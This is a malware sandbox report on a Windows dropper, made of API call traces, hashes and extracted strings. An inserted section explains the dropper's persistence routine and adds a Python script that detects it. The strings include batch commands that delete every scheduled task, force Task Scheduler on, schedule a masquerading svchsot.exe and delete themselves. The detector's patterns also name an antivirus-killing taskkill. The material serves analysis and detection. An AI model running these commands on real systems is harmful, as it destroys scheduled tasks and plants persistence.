                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$File$Process32wsprintf$ExecuteShell_mkdir$CloseCreateDirectoryDownloadFirstHandleNextResourceUpdate$CurrentModuleNameProcessSnapshotSystemToolhelp32_strcmpi$??2@BeginCopyDefaultFindLocalOpenTimeVersionWindowslstrcmpistrstr
                        • String ID: %s\%02d%02d%02d$%s\Default$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$5$5$5$5$7$7$:$:$:$:$:$:$AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==$HOST$O$X$\bb$\kk$\svchost.exe$\tt$a$c$c$c$c$c$c$d$f$f$h$h$h$h$h$k$m$m$m$o$o$o$o$o$o$open$p$p$p$t$t$t$t$t$t$t$t$x$x$x$x$x$x$x$x$x$z
                        • API String ID: 1692959224-1608945047
                        • Opcode ID: 6ee373041fc5b69c202ed7c93a9450f5e25cfb3e9310397815dfb81335c8f99e
                        • Instruction ID: f4c19f8245f88184ae2cc9662bd1a6f0e6decc73936f8711890b7c2b7bd0bd37
                        • Opcode Fuzzy Hash: 6ee373041fc5b69c202ed7c93a9450f5e25cfb3e9310397815dfb81335c8f99e
                        • Instruction Fuzzy Hash: AB42812114C3C09AE322C7788859B9FBFD6ABE2744F48495DF2C9572C2CAF59608C767

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        (Control-flow graph for 10002410-100028da: rendered graph omitted; node and edge list not reproduced)
                        APIs
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • sprintf.MSVCRT ref: 100024A9
                        • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 100024BC
                        • GetLastError.KERNEL32 ref: 100024C4
                        • CloseHandle.KERNEL32(00000000), ref: 100024D2
                        • ExitProcess.KERNEL32 ref: 100024D9
                        • GetCurrentProcessId.KERNEL32 ref: 100024DF
                        • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 100024EC
                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 100024FA
                        • CloseHandle.KERNEL32(00000000), ref: 10002501
                        • GetProcessWindowStation.USER32 ref: 1000253D
                        • OpenWindowStationA.USER32(winsta0,00000000,02000000), ref: 1000254E
                        • SetProcessWindowStation.USER32(00000000), ref: 10002559
                        • SetErrorMode.KERNEL32(00000001), ref: 10002561
                        • OpenEventA.KERNEL32(001F0003,00000000,?), ref: 100025F9
                        • Sleep.KERNEL32(0000003C), ref: 10002607
                        • CloseHandle.KERNEL32(00000000), ref: 1000261E
                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 1000263E
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 10002693
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 100026E4
                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 10002735
                        • GetTickCount.KERNEL32 ref: 1000274D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??3@Process$CloseHandleOpenResourceStationWindow$Error$??2@ClassCountCreateCurrentEventExitFindLastLoadLockModeMutexPrioritySleepTicksprintf
                        • String ID: AAAAAA$BBBBBB$CCCCCC$KKKKKK$winsta0
                        • API String ID: 2686462936-682215413
                        • Opcode ID: a8ca8c80a6142369269eae0f1b702b597b739753cb4697ee12a69c64f985840f
                        • Instruction ID: 3b4a00540ad0b1a63e2f642f75a40df8375a953d5dc77d0c7c87fc2ead154f6c
                        • Opcode Fuzzy Hash: a8ca8c80a6142369269eae0f1b702b597b739753cb4697ee12a69c64f985840f
                        • Instruction Fuzzy Hash: B8C1F3B55083819BF720DB64CC85F9B7399EB85380F00492DF9899325AEF74AD49C7A3

                        Control-flow Graph

                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100018DD
                        • Process32First.KERNEL32(00000000,00000000), ref: 100018FF
                        • GetCurrentProcessId.KERNEL32(00000000,00000000,00000002,00000000), ref: 10001914
                        • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 10001930
                        • GetModuleFileNameExA.PSAPI(00000000,00000000,00000000,00000104), ref: 10001950
                        • _strcmpi.MSVCRT ref: 100019C8
                        • CloseHandle.KERNEL32(00000000), ref: 100019D2
                        • Process32Next.KERNEL32(00000000,00000128), ref: 100019E2
                        • CloseHandle.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 10001A01
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandleProcessProcess32$CreateCurrentFileFirstModuleNameNextOpenSnapshotToolhelp32_strcmpi
                        • String ID: .$l$o$p$r$r$x$x
                        • API String ID: 3180913536-1602884452
                        • Opcode ID: 7b1cc6fae8b8e96e00bf6ab151f2474ef0aed6cbdd8b5175a9dc6eb4048c28c5
                        • Instruction ID: 1981d528a77da3d2e7c020a81ed99c1fa6edbfb66560a479a0d7426c1e2b8b98
                        • Opcode Fuzzy Hash: 7b1cc6fae8b8e96e00bf6ab151f2474ef0aed6cbdd8b5175a9dc6eb4048c28c5
                        • Instruction Fuzzy Hash: CD41A2311093819EE311CA28C8057EF7BD5EB96794F040A6DF9D4962D1DBB8EA0C87A7

                        Control-flow Graph

                        APIs
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100014DC
                        • FindFirstFileA.KERNEL32(?,?), ref: 10001546
                        • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000080,00000000), ref: 1000157B
                        • ReadFile.KERNEL32(00000000,?,00000104,?,00000000), ref: 10001598
                        • wsprintfA.USER32 ref: 100015B5
                        • CloseHandle.KERNEL32(00000000), ref: 100015BB
                        • wsprintfA.USER32 ref: 100015CA
                        • lstrlen.KERNEL32(?), ref: 100015D6
                        • wsprintfA.USER32 ref: 100015E2
                        • lstrlen.KERNEL32(?), ref: 100015E8
                          • Part of subcall function 10001380: wsprintfA.USER32 ref: 100013C0
                          • Part of subcall function 10001380: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100013EC
                          • Part of subcall function 10001380: CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,-00000006), ref: 10001467
                          • Part of subcall function 10001380: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,-00000006), ref: 1000148B
                          • Part of subcall function 10001380: CloseHandle.KERNEL32(00000000,?,?,?,?,-00000006), ref: 10001492
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$wsprintf$Resource$CloseCreateDirectoryFindHandleSystemlstrlen$??2@??3@FirstLoadLockReadWrite
                        • String ID: Default$XXXXXX
                        • API String ID: 725747062-3873574582
                        • Opcode ID: 17436c3e8dfc78ee21818db87effec4f0df1852729b88ed3c0589e36df66d51c
                        • Instruction ID: 06d9e77587ffc2f376b9537f2529253ee36837202e277d2efca6e5376354ed7c
                        • Opcode Fuzzy Hash: 17436c3e8dfc78ee21818db87effec4f0df1852729b88ed3c0589e36df66d51c
                        • Instruction Fuzzy Hash: D031063120030467E318CB74DC91EEF369AEBC5771F040B2DFA56972C0DEA4AE0982A6

                        Control-flow Graph

                        APIs
                        • GetVersionExA.KERNEL32 ref: 10001624
                          • Part of subcall function 100012E0: wsprintfA.USER32 ref: 1000132A
                          • Part of subcall function 100012E0: lstrlen.KERNEL32(?), ref: 10001356
                          • Part of subcall function 100012E0: gethostname.WS2_32(?,?), ref: 1000135E
                          • Part of subcall function 100012E0: lstrlen.KERNEL32(?), ref: 10001365
                        • getsockname.WS2_32 ref: 10001679
                          • Part of subcall function 10001240: RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000004), ref: 1000125F
                          • Part of subcall function 10001240: RegQueryValueExA.KERNEL32(?,~MHz,00000000,?,?,?,?,?,?,?,00000000,74DF0F00,00000000), ref: 10001280
                          • Part of subcall function 10001240: RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,74DF0F00,00000000), ref: 1000128B
                        • GetSystemInfo.KERNEL32(?), ref: 100016B0
                          • Part of subcall function 100012A0: 6E341E00.AVICAP32(00000000,?,00000064,?,00000032,?), ref: 100012BE
                        • GlobalMemoryStatus.KERNEL32 ref: 100016E8
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                          • Part of subcall function 100014B0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100014DC
                          • Part of subcall function 100014B0: FindFirstFileA.KERNEL32(?,?), ref: 10001546
                          • Part of subcall function 100014B0: CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000080,00000000), ref: 1000157B
                          • Part of subcall function 100014B0: ReadFile.KERNEL32(00000000,?,00000104,?,00000000), ref: 10001598
                          • Part of subcall function 100014B0: wsprintfA.USER32 ref: 100015B5
                          • Part of subcall function 100014B0: CloseHandle.KERNEL32(00000000), ref: 100015BB
                          • Part of subcall function 100014B0: wsprintfA.USER32 ref: 100015CA
                          • Part of subcall function 10004040: _ftol.MSVCRT ref: 1000407F
                          • Part of subcall function 10004040: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10004089
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileResourcewsprintf$??2@CloseFindSystemlstrlen$??3@CreateDirectoryE341FirstGlobalHandleInfoLoadLockMemoryOpenQueryReadStatusValueVersion_ftolgethostnamegetsockname
                        • String ID: $VVVVVV$f
                        • API String ID: 3571207253-510421235
                        • Opcode ID: cf75ee58161ee0da0ff394fad027957e315f1b8b0e5b118accf4a9f369d692b9
                        • Instruction ID: 33fa4957d2625c82f4dd4d49af6d64ef724f52dbf2ee7391606e67b5eae1fc84
                        • Opcode Fuzzy Hash: cf75ee58161ee0da0ff394fad027957e315f1b8b0e5b118accf4a9f369d692b9
                        • Instruction Fuzzy Hash: 7D3170B55083859FE324CF24C885ADBBBE5FBC8344F00891DF58983241DB74A549CBA2

                        Control-flow Graph

                        APIs
                        • GetVersion.KERNEL32 ref: 00401D47
                          • Part of subcall function 00403204: HeapCreate.KERNEL32(00000000,00001000,00000000,00401D80,00000000), ref: 00403215
                          • Part of subcall function 00403204: HeapDestroy.KERNEL32 ref: 00403254
                        • GetCommandLineA.KERNEL32 ref: 00401D95
                        • GetStartupInfoA.KERNEL32(?), ref: 00401DC0
                        • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00401DE3
                          • Part of subcall function 00401E3C: ExitProcess.KERNEL32 ref: 00401E59
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                        • String ID: `%G
                        • API String ID: 2057626494-3084719846
                        • Opcode ID: 6dca8f79f24d687120eb226177a613f114359dee426c783bff218e5cf532c4d5
                        • Instruction ID: 8b031e0a5d6a5300aa8ec9545b671fb7f12d1d155e848e7514a4d211685c87b2
                        • Opcode Fuzzy Hash: 6dca8f79f24d687120eb226177a613f114359dee426c783bff218e5cf532c4d5
                        • Instruction Fuzzy Hash: 872181B1940605AAD714EFA6DC0AA6E7FB8EF04715F50413FF906B72E2DB388501CB58
                        APIs
                        • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00407050,?,?,?,?,00401546,00407050,00407050,00025B6E,000007E9,00000000), ref: 0040103B
                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,00407050,?,?,?,?,00401546,00407050,00407050,00025B6E,000007E9,00000000), ref: 0040104B
                        • GetProcessHeap.KERNEL32(00000000,00000014,?,00407050,?,?,?,?,00401546,00407050,00407050,00025B6E,000007E9,00000000,0040166A,?), ref: 0040105C
                        • HeapAlloc.KERNEL32(00000000,?,00407050,?,?,?,?,00401546,00407050,00407050,00025B6E,000007E9,00000000,0040166A,?), ref: 00401063
                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,00407050,?,?,?,?,00401546,00407050,00407050,00025B6E,000007E9,00000000), ref: 00401087
                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,00407050,?,?,?,?,00401546,00407050,00407050,00025B6E,000007E9,00000000), ref: 00401096
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Alloc$Virtual$Heap$Process
                        • String ID:
                        • API String ID: 2020977634-0
                        • Opcode ID: cea414478d0dedf87864471c92e367e34a14255137baadfd88d29512cdf82f65
                        • Instruction ID: b27bc1bf02ddcf6f7219d98944c561fc0f53789a2e70de22857b9b6b46f1a235
                        • Opcode Fuzzy Hash: cea414478d0dedf87864471c92e367e34a14255137baadfd88d29512cdf82f65
                        • Instruction Fuzzy Hash: 95317071600301BFDB259FA9CC86F6B77A8EF48755F10042EF605EB291D7B4E8408B68
                        APIs
                        • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 0040132E
                        • LoadLibraryA.KERNEL32(?,?,?), ref: 0040134A
                        • GetProcAddress.KERNEL32(?,?), ref: 004013C3
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProcRead
                        • String ID:
                        • API String ID: 1160701153-0
                        • Opcode ID: 19ab7fcb41511a90460a528b176437d600203e2522bb16b445ba36c66acc818f
                        • Instruction ID: 4cc82f1652870d261133106db98651a4694f232484f10946250745a8c28fafb5
                        • Opcode Fuzzy Hash: 19ab7fcb41511a90460a528b176437d600203e2522bb16b445ba36c66acc818f
                        • Instruction Fuzzy Hash: CB314A726042028FE710CF19C884B26B7E8FB41314F19453EEC55AB6A1D779E819DBA5

                        Control-flow Graph

                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10002A79
                        • GetWindowsDirectoryA.KERNEL32(?,00000100), ref: 10002A89
                        • lstrcat.KERNEL32(?,1007A0CC), ref: 10002A9F
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • lstrcat.KERNEL32(?,00000000), ref: 10002ABC
                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 10002AC5
                        • Sleep.KERNEL32(00000032), ref: 10002ACD
                        • wsprintfA.USER32 ref: 10002B06
                        • lstrcat.KERNEL32(?,\svchsot.exe), ref: 10002B15
                        • MoveFileA.KERNEL32(?,?), ref: 10002B3B
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 10002B50
                        • wsprintfA.USER32 ref: 10002B68
                        • lstrlen.KERNEL32(?,00000000), ref: 10002B81
                        • CreateFileA.KERNEL32(?,10000000,00000005,00000000,00000002,00000080,00000000), ref: 10002BDA
                        • WriteFile.KERNEL32(00000000,@echo offschtasks /delete /tn * /fsc config Schedule start= auto net start "Task Scheduler",?,?,00000000), ref: 10002C05
                        • wsprintfA.USER32 ref: 10002C1C
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10002C47
                        • WriteFile.KERNEL32(00000000,del %0,?,?,00000000), ref: 10002C6C
                        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10002C6F
                        • WinExec.KERNEL32(?,00000000), ref: 10002C7F
                        • Sleep.KERNEL32(000003E8,?,?,00000000), ref: 10002C8A
                        • FindWindowA.USER32(00000000,1007A204), ref: 10002C97
                        • PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 10002CA4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$ResourceWritelstrcatwsprintf$CreateDirectoryFindSleep$??2@??3@CloseCopyExecHandleLoadLockMessageModuleMoveNamePostWindowWindowslstrlen
                        • String ID: %s\JH.BAT$@echo offschtasks /delete /tn * /fsc config Schedule start= auto net start "Task Scheduler"$At %d:00 %s$LLLLLL$QQPCTray.exe$Run$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$XXXXXX$\svchsot.exe$del %0
                        • API String ID: 946857149-3587594710
                        • Opcode ID: dfb84fb4c62a7a3ec90e039068f50a3200b882a1525b33d655db413f11240f0b
                        • Instruction ID: 5d5c3419696c77e4a3b1d24feaff1c46a1e19092fd6b18da6b7a487b46fae157
                        • Opcode Fuzzy Hash: dfb84fb4c62a7a3ec90e039068f50a3200b882a1525b33d655db413f11240f0b
                        • Instruction Fuzzy Hash: 1451E4711443457FF324CBA4CC89FEB739DEBC8700F004918F785960D1EAB9A9498BA6
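The call sequence above is the dropper's persistence routine: it resolves its own path and the Windows directory, copies itself into a subdirectory there as svchsot.exe, writes a JH.BAT file, runs it with WinExec and finally posts WM_CLOSE (0x10) to a window found by class name. The batch file deletes every scheduled task (the "Delete All Scheduled Tasks" Sigma hit), forces the Task Scheduler service on, schedules the copied binary with "At %d:00 %s" jobs and deletes itself with "del %0". The line breaks the sandbox stripped from the WriteFile buffer are inferred from the command syntax: "@echo off", "schtasks /delete /tn * /f", "sc config Schedule start= auto", "net start \"Task Scheduler\"". What follows is an added example, not part of the Joe Sandbox report and not the malware's code: a Python correlation check over constructed, Sysmon-style process-creation events (the pid/ppid/image/cmdline field names, the pids and the drop-directory name are assumptions) that flags a parent process whose children run the whole chain, using the command strings the report lists.

```python
"""Correlate process-creation events for the JH.BAT persistence chain.

Added example (not part of the Joe Sandbox report and not the malware's code).
Event layout is a constructed, Sysmon-like dict with pid/ppid/image/cmdline;
those field names are an assumption. The stage patterns come from the command
strings the report lists for this function and the dropper's main routine.
"""
import re
from collections import defaultdict

# Constructed sample events. Drop directory "dropdir", pids and the benign
# control events are placeholders, not values from the report.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c C:\Windows\dropdir\JH.BAT"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks /delete /tn * /f"},
    {"pid": 102, "ppid": 100, "image": r"C:\Windows\System32\sc.exe",
     "cmdline": "sc config Schedule start= auto"},
    {"pid": 103, "ppid": 100, "image": r"C:\Windows\System32\net.exe",
     "cmdline": 'net start "Task Scheduler"'},
    {"pid": 104, "ppid": 100, "image": r"C:\Windows\System32\at.exe",
     "cmdline": r"At 11:00 C:\Windows\dropdir\svchsot.exe"},
    # Benign control: a named task deletion under another parent must not fire.
    {"pid": 200, "ppid": 2, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c backup.bat"},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /delete /tn "Nightly Backup" /f'},
]

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')

def tokens(cmdline):
    """Split a Windows command line into lower-cased arguments, keeping a
    double-quoted argument (e.g. "Task Scheduler") as one token."""
    return [(quoted or bare).lower() for quoted, bare in _TOKEN.findall(cmdline)]

def _exe(token):
    """Basename of the first argument without a trailing .exe."""
    name = token.rsplit("\\", 1)[-1]
    return name[:-4] if name.endswith(".exe") else name

def classify(cmdline):
    """Map one command line to a stage of the chain, or None if it is none."""
    t = tokens(cmdline)
    if not t:
        return None
    exe = _exe(t[0])
    if exe == "schtasks" and "/delete" in t and "*" in t:
        return "delete_all_tasks"          # Sigma: Delete All Scheduled Tasks
    if exe == "sc" and t[1:2] == ["config"] and "schedule" in t \
            and "start=" in t and "auto" in t:
        return "enable_task_scheduler"     # sc config Schedule start= auto
    if exe in ("net", "net1") and t[1:2] == ["start"] \
            and t[2:3] and t[2] in ("task scheduler", "schedule"):
        return "start_task_scheduler"      # net start "Task Scheduler"
    if exe == "at" and len(t) >= 3 and re.fullmatch(r"\d{1,2}:\d{2}", t[1]):
        return "at_job"                    # At %d:00 %s
    if exe == "taskkill" and "/im" in t and "ksafetray.exe" in t:
        return "kill_av_tray"              # taskkill /f /im KSafeTray.exe
    return None

CHAIN = ("delete_all_tasks", "enable_task_scheduler",
         "start_task_scheduler", "at_job")

def find_chains(events):
    """Return {parent_pid: [(pid, stage, cmdline), ...]} for every parent
    whose children cover all stages in CHAIN."""
    by_parent = defaultdict(list)
    for ev in events:
        stage = classify(ev["cmdline"])
        if stage:
            by_parent[ev["ppid"]].append((ev["pid"], stage, ev["cmdline"]))
    return {ppid: hits for ppid, hits in by_parent.items()
            if all(s in {h[1] for h in hits} for s in CHAIN)}

def stage_hits(events):
    """Every individual stage match, so a lone wildcard task deletion still
    surfaces as a lower-confidence alert."""
    return [(ev["pid"], classify(ev["cmdline"])) for ev in events
            if classify(ev["cmdline"])]

if __name__ == "__main__":
    for ppid, hits in find_chains(SAMPLE_EVENTS).items():
        print(f"JH.BAT-style chain under parent pid {ppid}:")
        for pid, stage, cmd in hits:
            print(f"  {pid:>5}  {stage:<22} {cmd}")
```

The chain match keys on the parent pid rather than on timing, because the batch runs its commands back to back from one cmd.exe; the per-stage list is kept separately so the wildcard schtasks deletion, which has no legitimate admin use, can be alerted on its own.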

                        Control-flow Graph (graph image not reproduced; executed/not-executed block colouring lost)
                        • Basic blocks 1000da90-1000deaa; calls: RegOpenKeyExA, RegQueryValueExA, RegEnumKeyExA, RegEnumValueA, wsprintfA, lstrcat, strncat, strchr, call 1000deaf, call 1000da60
                        APIs
